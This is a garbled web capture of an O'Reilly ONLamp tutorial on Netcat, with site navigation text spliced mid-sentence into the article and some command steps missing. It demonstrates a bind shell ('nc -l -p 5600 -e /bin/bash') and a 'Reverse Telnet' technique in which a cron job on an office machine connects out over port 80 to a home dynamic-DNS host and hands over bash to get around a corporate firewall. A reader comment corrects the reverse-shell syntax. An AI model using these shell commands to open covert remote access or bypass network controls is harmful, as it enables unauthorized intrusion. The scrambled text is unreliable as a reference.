Академический Документы
Профессиональный Документы
Культура Документы
http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html
O'Reilly Home
Community
Books
Conferences
School of Technology
About
We've expanded our LAMP news coverage and improved our search! Search for all things LAMP across O'Reilly!
Search
Search Tips
Listen
Print
Discuss
Subscribe to ONLamp
Subscribe to Newsletters
1 di 4
21-04-2009 22:50
http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html
Instead, we will use lo:1 and lo:2 virtual interfaces. The following method will allow you to
About
O'Reilly
O'Reilly
assign many IP numbers to the same network
interface,
such as eth0:0 or eth0:1.More
As root,
enter:Sites
Academic Solutions
O'Reilly Radar
% ifconfig lo:1 10.0.1.1
Authors
Ignite
% ifconfig lo:2 10.0.1.2
Contacts
Tools of Change for Publishing
2009, O'Reilly Media, Inc.
Customer Service
Digital Media
(707)
827-7000
/ (800)
Now
enter
ifconfig
to examine your interfaces:
Jobs
Inside iPhone
998-9938
Newsletters
O'Reilly FYI
loAll
Link
encap:Local
Loopback
trademarks
and registered
inet addr:127.0.0.1 Mask:255.0.0.0 O'Reilly Labs
makezine.com
trademarks appearing on
UP LOOPBACK RUNNING MTU:16436 Metric:1
Press Room
craftzine.com
oreilly.com are the property of
RX packets:146 errors:0 dropped:0 overruns:0
frame:0
Privacy Policy
hackszine.com
respectiveerrors:0
owners. dropped:0 overruns:0 carrier:0
TXtheir
packets:146
RSS Feeds
perl.com
collisions:0 txqueuelen:0
Terms of Service
xml.com
RX bytes:7708 (7.5 KiB) TX bytes:7708 (7.5 KiB)
User Groups
lo:1 Link encap:Local Loopback
Writing for O'Reilly
Partner Sites
inet addr:10.0.1.1 Mask:255.0.0.0
InsideRIA
UP LOOPBACK RUNNING MTU:16436 Metric:1
java.net
lo:2 Link encap:Local Loopback
inet addr:10.0.1.2 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
Content Archive
Business Technology
Computer Technology
Google
Microsoft
Mobile
Network
Operating System
Digital Photography
Programming
Software
O'Reilly Training: iPhone
Web
Forensics: Recovering
Web Design
Evidence, Personal Data,
and Corporate Assets
Now that we have two network interfaces, we can continue with our examples as if we were
working on two separate computers with different IP addresses.
Network Connection:
As I've stated before, Netcat is a telnet client. With the basic usage you can connect to any port
with nc host port. When you make a connection this way, everything you type goes to the
remote machine (if it's listening to that port) and every response comes back to you. This goes on
until the network connection is broken. As for the remote computer, I must remind you that Netcat
is both a client and a server.
Now, let's open two consoles. One will be our server, listening to port 5600:
$ nc -l -p 5600
The other will be our client that connects to that port.
$ nc 10.0.1.1 5600
Now everything you do will be repeated at the first console. We have made our first connection.
Experiment to your heart's content. Press Enter, Backspace, Ctrl-D, and Ctrl-C and see what
happens. Ctrl-C should have cut your connection.
At the first console give the command:
$ nc -l -p 5600 -vv
In the second:
$ nc 10.0.1.1 5600
Did you see anything different?
listening on [any] 5600 ...
10.0.1.1: inverse host lookup failed: Unknown host
connect to [10.0.1.1] from (UNKNOWN) [10.0.1.1] 33354
This time, Netcat was generous with its information. The extra -vv command option put Netcat in
verbose mode. If you use one v then you end up with less information. This command is especially
valuable when troubleshooting. At the end, when you pressed Ctrl-c, Netcat exited, reporting how
many bytes were sent and received.
As in our first example we made connection between two virtual computers without protocol or
rights management (as far as the firewalls let us).
File Transfer
One of the most practical usages of this network connection is the file transfer. As a basic Netcat
function, this feature may be used to great effect in the hands of an experienced user. For a
freshly installed computer, setting up a ftp server or, worse, meddling with rcp or scp protocols
may be nauseating. Those commands may not be available for one, and multiple layers of control
mechanisms may interfere with their functionality. You can still transfer files with just one nc
command.
C in a Nutshell,
Format: Print, $39.95
Sponsored Resources
Inside Lightroom
In the server we said > filename.back. Any output will be directed to this file. As it happens, the
output is the file filename which is send by the client. Think of this as a pipeline. We take a
bucket (file), pour the contents to the pipeline (Netcat's port), and, at the other end we fill
another bucket from the pipeline.
Telnet
2 di 4
21-04-2009 22:50
We can now transfer files, but maybe we want to make something more useful. For example, we
might want to login to a remote machine and do some work. We want to telnet without the hassle
of working through access control mechanisms. The -e option comes in handy.
On the first console, enter:
http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html
Getting Started
with Pyparsing
by Paul McGuire
October 2007
$9.99 USD
$ nc -l -p 5600 -e /bin/bash
and at the second console:
$ nc 10.0.1.1. 5600
Now it is as if we are connected to the first machine and typing at the shell. We can see every
output of our command and do whatever we want with the server machine. We are connected to it
as the root user. This is admittedly very scary and a bit unwise.
Rails on
Windows
by Curt Hibbs ,
Brian Hogan
May 2007
$9.99 USD
Sponsored by:
Reverse Telnet
As we have such a generic tool, capable of many things, we can try something nastier (and thus
more useful). Consider a nice computer, with broadband network access, behind some firewall (as
all useful computers are) in our office. The firewall will not allow any outside connections, only
those queried from inside. This computer seems impossible to reach. To begin with, the computer
would not have a real IP that we could just type and reach; it is behind a router and firewall, using
their IPs instead.
Now what if we want to log into this computer and use it remotely, perhaps grabbing some files we
forgot to bring home to work on tonight? We want all this with minimum security breach. Sounds
like a challenge.
As we saw before, telnet worked with one machine waiting for a connection and the other
connecting to it and giving commands. Telnet will not do the job here; not only are all ports of the
corporate firewall blocked, the machine we want to reach does not even have a legal IP. Our
technique should do just the reverse.
We have a server whose only allowed outside connection is port 80 for daily use, but it doesn't
have an outside IP address. The other computer at home probably has a real IP and whatever
ports you want are open at your request. Reversing the roles would solve our problems: make our
computer at work connect to the home computer, taking commands from the client and
performing them on the server. It's the reverse of usual telnet, so we call it Reverse Telnet.
First, let's name the machines. The one at work is called WORK and the one at home is called HOME.
If we do not have a permanent IP at home (a dialup user usually) we should get a dynamic DNS
name. Lots of organizations provide them, most at no charge such as dyndns.org. We do this
because in order to connect to home computer we must know its IP (or domain name)
beforehand.
At the work computer, we'll set up a cron job to start at 22:01. Just as in the telnet example it
connects to myhome.dyndns.org (our dynamic DNS address) and starts bash.
And at home just at 22:00 or so we start:
$ nc -vv -l -p 80
to begin listening on port 80 for incoming connections.
At 22:01, WORK connects to HOME, starts bash and says 'Master!' Bingo. We are connected to WORK
(or vice versa), and WORK is ready to operate any command we want.
We can try this at our virtual network (lo:1 and lo:2). To start the client listening for a
connection:
$ nc -vv -l -p 80
To make a connection from the server:
$ nc 10.0.1.1 80 -e /bin/bash
It is very simple and efficient, because we only use outgoing port 80, the most widely used port
because it is used for web access. No one would block port 80 because everyone needs web
access. They can force you to use a local proxy for that, but you can use another port like 21 or
23 which are harder to put behind a proxy. If you have Internet access you should be able to find
at least one open port.
Netcat has lots of other uses with which you can experiment through the loopback interface setup.
As long as you know the TCP/IP machine and basics of the protocols, there is virtually no limit to
what you can do with Netcat. In the future, I will describe some other daily (arcane ;) uses of
Netcat, Cryptcat, and maybe their complicated and powerful cousin SoCat.
3 di 4
21-04-2009 22:50
http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html
Resources
Netcat
Cryptcat: Netcat with cryptography
SoCat: Netcat on steroids
KIVILCIM Hindistan works as a full time computer security consultant with a CISSP, using Linux
and Free Software as weapons of choice.
Return to ONLamp.com.
Netcat in windows
2007-09-12 11:25:14 ITwanabe [Reply | View]
error in syntax
2005-04-05 10:39:47 solipsist [Reply | View]
this ...
To make a connection from the server:
$ nc 10.0.1.1 80 -e /bin/bash
should be ...
$ nc -e /bin/bash 10.0.1.1 80
at least for my version netcat-1.10_2 on FreeBSD
Hi,
I have tried to get cryptcat working on AIX with no success.
Also the link from this website to cryptcat comes up with page not found on farn9 site.
Any comments / suggestions appreciated.
4 di 4
21-04-2009 22:50